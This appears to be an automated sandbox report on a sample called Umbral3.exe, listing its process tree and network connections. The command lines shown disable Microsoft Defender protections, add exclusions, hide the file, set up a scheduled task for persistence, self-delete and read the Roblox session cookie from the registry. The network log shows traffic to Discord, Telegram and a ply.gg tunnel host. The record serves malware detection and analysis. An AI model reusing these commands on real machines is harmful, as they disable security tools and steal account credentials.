C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.8.538590279\47800966" -childID 7 -isForBrowser -prefsHandle 6088 -prefMapHandle 6084 -prefsLen 26593 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2943164-ddd4-4e86-942c-e19c63f1db72} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 5540 1f29ae86e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.9.290925440\879106275" -childID 8 -isForBrowser -prefsHandle 4956 -prefMapHandle 4952 -prefsLen 26593 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a5e67f4-9c56-468d-825a-fecb32bd0cdb} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 6132 1f29ae87a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.10.1093434033\1828280291" -childID 9 -isForBrowser -prefsHandle 6216 -prefMapHandle 6240 -prefsLen 26593 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ce5add9-4239-41ba-9c63-2b03f8729b82} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 6316 1f29ae89e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.11.752001682\1145238142" -childID 10 -isForBrowser -prefsHandle 6500 -prefMapHandle 5016 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {70a45c95-38f3-4407-a532-a9cf137d2957} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4992 1f29342f858 tab

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.12.1289579916\1137941508" -childID 11 -isForBrowser -prefsHandle 5288 -prefMapHandle 6312 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {72cc7662-f316-4635-a009-a2a660b2e83d} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 5180 1f299ba9958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.13.240442987\989605971" -childID 12 -isForBrowser -prefsHandle 3972 -prefMapHandle 2504 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {97f741b7-7816-4330-8aa9-1535bcb29030} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 5196 1f29ad29158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.14.1661367114\708816911" -childID 13 -isForBrowser -prefsHandle 10296 -prefMapHandle 10292 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {976df849-95bd-455c-94fb-fd8854218b3a} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 10304 1f29b124258 tab

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\Opera.exe

"C:\Users\Admin\Downloads\Opera.exe"

C:\Users\Admin\AppData\Local\Temp\Umbral3.exe

"C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2ec

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.15.1886885090\1676064267" -childID 14 -isForBrowser -prefsHandle 10128 -prefMapHandle 2648 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {df02ce31-9c5d-4658-830f-0efacaa4ad29} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 6024 1f29af20458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.16.967545651\1558656289" -childID 15 -isForBrowser -prefsHandle 10212 -prefMapHandle 10152 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5496fa6d-b453-4e7b-972d-4dbf8ca616aa} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 10160 1f29b2d2d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.17.293763883\1533402784" -childID 16 -isForBrowser -prefsHandle 4432 -prefMapHandle 4436 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {547af0a8-3666-4dd3-986d-86e1e6c5cd0b} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4324 1f29b2d3358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.18.1405195493\1341552779" -childID 17 -isForBrowser -prefsHandle 10128 -prefMapHandle 10148 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {33ade00c-ce6a-45e1-a633-e0ecedf3674f} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 9856 1f29b309558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.19.824604785\1969642871" -childID 18 -isForBrowser -prefsHandle 10364 -prefMapHandle 4560 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0bc3241-c8dc-4ebb-9cdc-239d78d8197a} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4620 1f2994d4e58 tab

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 216.58.201.99:443 gstatic.com tcp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 44.233.67.78:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 8.8.8.8:53 166.188.117.34.in-addr.arpa udp
US 8.8.8.8:53 78.67.233.44.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
N/A 127.0.0.1:50001 tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
N/A 127.0.0.1:50027 tcp
US 8.8.8.8:53 phentermine-partial.gl.at.ply.gg udp
US 147.185.221.19:36969 phentermine-partial.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 oxy.name udp
US 104.21.70.24:443 oxy.name tcp
US 8.8.8.8:53 oxy.name udp
US 8.8.8.8:53 oxy.name udp
US 8.8.8.8:53 24.70.21.104.in-addr.arpa udp
US 104.21.70.24:443 oxy.name udp
US 8.8.8.8:53 oxy.st udp
RU 185.178.208.137:443 oxy.st tcp
US 8.8.8.8:53 oxy.st udp
US 8.8.8.8:53 oxy.st udp
US 8.8.8.8:53 contextual.media.net udp
US 8.8.8.8:53 ads.themoneytizer.com udp
US 8.8.8.8:53 smatr.net udp
US 8.8.8.8:53 cdn.adlook.me udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 contextual.media.net udp
NL 88.208.46.222:443 smatr.net tcp
US 8.8.8.8:53 smatr.net udp
US 104.22.62.227:443 ads.themoneytizer.com tcp
US 104.22.62.227:443 ads.themoneytizer.com tcp
US 8.8.8.8:53 contextual.media.net udp
US 8.8.8.8:53 smatr.net udp
RU 193.17.93.93:443 cdn.adlook.me tcp
US 8.8.8.8:53 ads.themoneytizer.com.cdn.cloudflare.net udp
US 8.8.8.8:53 cl-7c56f4b3.edgecdn.ru udp
US 8.8.8.8:53 ads.themoneytizer.com.cdn.cloudflare.net udp
US 8.8.8.8:53 cl-7c56f4b3.edgecdn.ru udp
US 8.8.8.8:53 onetag-sys.com udp
US 8.8.8.8:53 ced.sascdn.com udp
US 8.8.8.8:53 gum.criteo.com udp
US 8.8.8.8:53 tag.leadplace.fr udp
US 8.8.8.8:53 secure.quantserve.com udp
US 8.8.8.8:53 p.cpx.to udp
US 8.8.8.8:53 adtrack.adleadevent.com udp
DE 51.75.86.98:443 onetag-sys.com tcp
US 8.8.8.8:53 onetag-sys.com udp
US 8.8.8.8:53 a1184.b.akamai.net udp
FR 145.239.192.166:443 tag.leadplace.fr tcp
US 8.8.8.8:53 yastatic.net udp
IE 52.48.122.2:443 adtrack.adleadevent.com tcp
IE 3.248.98.31:443 p.cpx.to tcp
US 8.8.8.8:53 ogffa.net udp
US 8.8.8.8:53 counter.yadro.ru udp
US 8.8.8.8:53 global.px.quantserve.com udp
US 8.8.8.8:53 onetag-sys.com udp
US 8.8.8.8:53 a1184.b.akamai.net udp
US 8.8.8.8:53 system-notify.app udp
US 8.8.8.8:53 global.px.quantserve.com udp
NL 88.208.46.222:443 ogffa.net tcp
RU 178.154.131.215:443 yastatic.net tcp
RU 178.154.131.215:443 yastatic.net tcp
US 8.8.8.8:53 gum.nl3.vip.prod.criteo.com udp
US 8.8.8.8:53 ip-fo-ovh.infra.leadplace.fr udp
US 8.8.8.8:53 adtrack-php-loadbalancer-vpc-1246401395.eu-west-1.elb.amazonaws.com udp
US 8.8.8.8:53 gum.nl3.vip.prod.criteo.com udp
DE 157.90.33.122:443 system-notify.app tcp
US 8.8.8.8:53 ip-fo-ovh.infra.leadplace.fr udp
US 8.8.8.8:53 137.208.178.185.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 222.46.208.88.in-addr.arpa udp
US 8.8.8.8:53 227.62.22.104.in-addr.arpa udp
US 8.8.8.8:53 93.93.17.193.in-addr.arpa udp
US 8.8.8.8:53 227.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 166.192.239.145.in-addr.arpa udp
US 8.8.8.8:53 98.86.75.51.in-addr.arpa udp
US 8.8.8.8:53 2.122.48.52.in-addr.arpa udp
US 8.8.8.8:53 31.98.248.3.in-addr.arpa udp
US 8.8.8.8:53 215.131.154.178.in-addr.arpa udp
US 8.8.8.8:53 adtrack-php-loadbalancer-vpc-1246401395.eu-west-1.elb.amazonaws.com udp
US 8.8.8.8:53 p.cpx.to udp
US 8.8.8.8:53 ogffa.net udp
US 8.8.8.8:53 counter.yadro.ru udp
US 8.8.8.8:53 p.cpx.to udp
US 8.8.8.8:53 counter.yadro.ru udp
US 8.8.8.8:53 ogffa.net udp
US 8.8.8.8:53 yastatic.net udp
US 8.8.8.8:53 ads.adlook.me udp
US 8.8.8.8:53 system-notify.app udp
DE 51.75.86.98:443 onetag-sys.com udp
US 8.8.8.8:53 yastatic.net udp
RU 5.200.43.243:443 ads.adlook.me tcp
US 8.8.8.8:53 lb-prod.adlook.me udp
US 8.8.8.8:53 ib.adnxs.com udp
US 8.8.8.8:53 system-notify.app udp
US 8.8.8.8:53 match.adsrvr.org udp
US 8.8.8.8:53 ib.anycast.adnxs.com udp
US 8.8.8.8:53 lb-prod.adlook.me udp
US 8.8.8.8:53 match.adsrvr.org udp
US 8.8.8.8:53 ib.anycast.adnxs.com udp
US 8.8.8.8:53 match.adsrvr.org udp
BE 2.21.16.25:443 contextual.media.net tcp
US 2.18.190.77:443 a1184.b.akamai.net tcp
NL 178.250.1.11:443 gum.nl3.vip.prod.criteo.com tcp
DE 91.228.74.226:443 global.px.quantserve.com tcp
RU 88.212.201.198:443 counter.yadro.ru tcp
NL 185.89.210.212:443 ib.adnxs.com tcp
US 52.223.40.198:443 match.adsrvr.org tcp
US 8.8.8.8:53 uidsync.net udp
US 8.8.8.8:53 uidsync.net udp
US 8.8.8.8:53 id5-sync.com udp
US 8.8.8.8:53 uidsync.net udp
US 8.8.8.8:53 id5-sync.com udp
DE 162.19.138.120:443 id5-sync.com tcp
DE 23.88.8.123:443 uidsync.net tcp
DE 23.88.8.123:443 uidsync.net tcp
US 8.8.8.8:53 id5-sync.com udp
US 8.8.8.8:53 csm.nl3.eu.criteo.net udp
US 8.8.8.8:53 csm.nl3.vip.prod.criteo.net udp
BE 2.21.16.25:443 contextual.media.net udp
US 8.8.8.8:53 lg3.media.net udp
US 8.8.8.8:53 rules.quantcount.com udp
US 8.8.8.8:53 csm.nl3.vip.prod.criteo.net udp
US 8.8.8.8:53 s.cpx.to udp
US 8.8.8.8:53 lg3.media.net udp
US 8.8.8.8:53 d2fashanjl7d9f.cloudfront.net udp
IE 3.248.98.31:443 s.cpx.to tcp
US 8.8.8.8:53 s.cpx.to udp
US 8.8.8.8:53 122.33.90.157.in-addr.arpa udp
US 8.8.8.8:53 243.43.200.5.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 198.40.223.52.in-addr.arpa udp
US 8.8.8.8:53 11.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 212.210.89.185.in-addr.arpa udp
US 8.8.8.8:53 25.16.21.2.in-addr.arpa udp
US 8.8.8.8:53 226.74.228.91.in-addr.arpa udp
US 8.8.8.8:53 198.201.212.88.in-addr.arpa udp
US 8.8.8.8:53 120.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 123.8.88.23.in-addr.arpa udp
US 8.8.8.8:53 lg3.media.net udp
US 8.8.8.8:53 d2fashanjl7d9f.cloudfront.net udp
US 8.8.8.8:53 s.cpx.to udp
US 184.30.156.32:443 lg3.media.net tcp
FR 52.222.144.28:443 d2fashanjl7d9f.cloudfront.net tcp
US 8.8.8.8:53 pixel.quantserve.com udp
US 184.30.156.32:443 lg3.media.net udp
DE 91.228.74.205:443 pixel.quantserve.com tcp
NL 178.250.1.25:443 csm.nl3.vip.prod.criteo.net tcp
US 8.8.8.8:53 dnacdn.net udp
US 8.8.8.8:53 ag.gbc.criteo.com udp
US 8.8.8.8:53 gem.gbc.criteo.com udp
US 8.8.8.8:53 gbc0.fr3.eu.criteo.com udp
NL 178.250.1.11:443 dnacdn.net tcp
US 8.8.8.8:53 dnacdn.net udp
US 8.8.8.8:53 gbc0.fr3.eu.criteo.com udp
US 8.8.8.8:53 gbc0.nl3.eu.criteo.com udp
US 8.8.8.8:53 dnacdn.net udp
FR 185.235.86.7:443 gbc0.fr3.eu.criteo.com tcp
NL 185.235.87.21:443 gem.gbc.criteo.com tcp
US 8.8.8.8:53 28.144.222.52.in-addr.arpa udp
US 8.8.8.8:53 32.156.30.184.in-addr.arpa udp
US 8.8.8.8:53 205.74.228.91.in-addr.arpa udp
US 8.8.8.8:53 25.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 21.87.235.185.in-addr.arpa udp
US 8.8.8.8:53 7.86.235.185.in-addr.arpa udp
US 8.8.8.8:53 download.oxy.st udp
RU 185.178.208.137:443 download.oxy.st tcp
US 8.8.8.8:53 download.oxy.st udp
US 8.8.8.8:53 download.oxy.st udp
US 8.8.8.8:53 ip-fo-ovh.infra.leadplace.fr udp
DE 157.90.33.122:443 uidsync.net tcp
DE 157.90.33.68:443 uidsync.net tcp
DE 157.90.33.68:443 uidsync.net tcp
US 8.8.8.8:53 68.33.90.157.in-addr.arpa udp
US 8.8.8.8:53 s1.oxy.st udp
US 104.21.234.182:443 s1.oxy.st tcp
US 8.8.8.8:53 s1.oxy.st udp
US 8.8.8.8:53 s1.oxy.st udp
US 104.21.234.182:443 s1.oxy.st udp
US 8.8.8.8:53 182.234.21.104.in-addr.arpa udp
US 8.8.8.8:53 tmzr.themoneytizer.fr udp
US 188.114.96.2:443 tmzr.themoneytizer.fr tcp
US 8.8.8.8:53 tmzr.themoneytizer.fr udp
US 8.8.8.8:53 tmzr.themoneytizer.fr udp
US 188.114.96.2:443 tmzr.themoneytizer.fr udp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 id.crwdcntrl.net udp
US 8.8.8.8:53 ww1097.smartadserver.com udp
FR 185.86.139.95:443 ww1097.smartadserver.com tcp
US 8.8.8.8:53 itx4.smartadserver.com udp
FR 185.86.139.95:443 itx4.smartadserver.com tcp
US 8.8.8.8:53 id.crwdcntrl.net udp
US 8.8.8.8:53 itx4.smartadserver.com udp
US 8.8.8.8:53 id.crwdcntrl.net udp
NL 178.250.1.11:443 dnacdn.net tcp
DE 162.19.138.120:443 id5-sync.com tcp
IE 52.211.13.38:443 id.crwdcntrl.net tcp
NL 178.250.1.11:443 dnacdn.net tcp
US 8.8.8.8:53 lb.eu-1-id5-sync.com udp
DE 162.19.138.119:443 lb.eu-1-id5-sync.com tcp
US 8.8.8.8:53 lb.eu-1-id5-sync.com udp
US 8.8.8.8:53 lb.eu-1-id5-sync.com udp
DE 162.19.138.120:443 lb.eu-1-id5-sync.com tcp
US 8.8.8.8:53 95.139.86.185.in-addr.arpa udp
US 8.8.8.8:53 38.13.211.52.in-addr.arpa udp
US 8.8.8.8:53 119.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 216.58.201.99:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 ww1097.smartadserver.com udp
US 8.8.8.8:53 itx5.smartadserver.com udp
FR 185.86.138.122:443 itx5.smartadserver.com tcp
FR 185.86.138.122:443 itx5.smartadserver.com tcp
US 8.8.8.8:53 itx5.smartadserver.com udp
US 8.8.8.8:53 122.138.86.185.in-addr.arpa udp
US 8.8.8.8:53 aus5.mozilla.org udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.197:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com udp
US 8.8.8.8:53 r5---sn-aigzrn7d.gvt1.com udp
US 8.8.8.8:53 197.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
GB 173.194.138.202:443 r5---sn-aigzrn7d.gvt1.com tcp
US 8.8.8.8:53 r5.sn-aigzrn7d.gvt1.com udp
US 8.8.8.8:53 r5.sn-aigzrn7d.gvt1.com udp
GB 173.194.138.202:443 r5.sn-aigzrn7d.gvt1.com udp
US 8.8.8.8:53 202.138.194.173.in-addr.arpa udp
FR 185.86.138.122:443 itx5.smartadserver.com tcp
US 8.8.8.8:53 itx5.smartadserver.com udp
FR 185.86.138.122:443 itx5.smartadserver.com tcp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp
FR 185.86.138.122:443 itx5.smartadserver.com tcp
US 8.8.8.8:53 itx5.smartadserver.com udp
FR 185.86.138.122:443 itx5.smartadserver.com tcp
FR 185.86.138.122:443 itx5.smartadserver.com tcp
US 8.8.8.8:53 itx5.smartadserver.com udp
US 8.8.8.8:53 metrics.biddertmz.com udp
FR 185.86.138.122:443 itx5.smartadserver.com tcp
IE 34.248.22.168:443 metrics.biddertmz.com tcp
US 8.8.8.8:53 metrics.biddertmz.com udp
US 8.8.8.8:53 metrics.biddertmz.com udp
IE 34.248.22.168:443 metrics.biddertmz.com tcp
US 8.8.8.8:53 168.22.248.34.in-addr.arpa udp
US 147.185.221.19:36969 phentermine-partial.gl.at.ply.gg tcp
FR 185.86.138.122:443 itx5.smartadserver.com tcp
US 8.8.8.8:53 itx5.smartadserver.com udp
FR 185.86.138.122:443 itx5.smartadserver.com tcp
US 8.8.8.8:53 134.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 ww1097.smartadserver.com udp
US 8.8.8.8:53 euw1.smartadserver.com udp
NL 89.149.192.193:443 euw1.smartadserver.com tcp
NL 89.149.192.193:443 euw1.smartadserver.com tcp
US 8.8.8.8:53 euw1.smartadserver.com udp
US 8.8.8.8:53 193.192.149.89.in-addr.arpa udp
US 147.185.221.19:36969 phentermine-partial.gl.at.ply.gg tcp
NL 89.149.192.193:443 euw1.smartadserver.com tcp
US 8.8.8.8:53 euw1.smartadserver.com udp
NL 89.149.192.193:443 euw1.smartadserver.com tcp
US 147.185.221.19:36969 phentermine-partial.gl.at.ply.gg tcp
NL 89.149.192.193:443 euw1.smartadserver.com tcp
US 8.8.8.8:53 euw1.smartadserver.com udp
NL 89.149.192.193:443 euw1.smartadserver.com tcp
NL 89.149.192.193:443 euw1.smartadserver.com tcp
US 8.8.8.8:53 euw1.smartadserver.com udp
NL 89.149.192.193:443 euw1.smartadserver.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 oxy.st udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.117.188.166:443 contile.services.mozilla.com udp
RU 185.178.208.137:443 oxy.st tcp
US 8.8.8.8:53 oxy.st udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 oxy.st udp
US 8.8.8.8:53 ads.themoneytizer.com udp
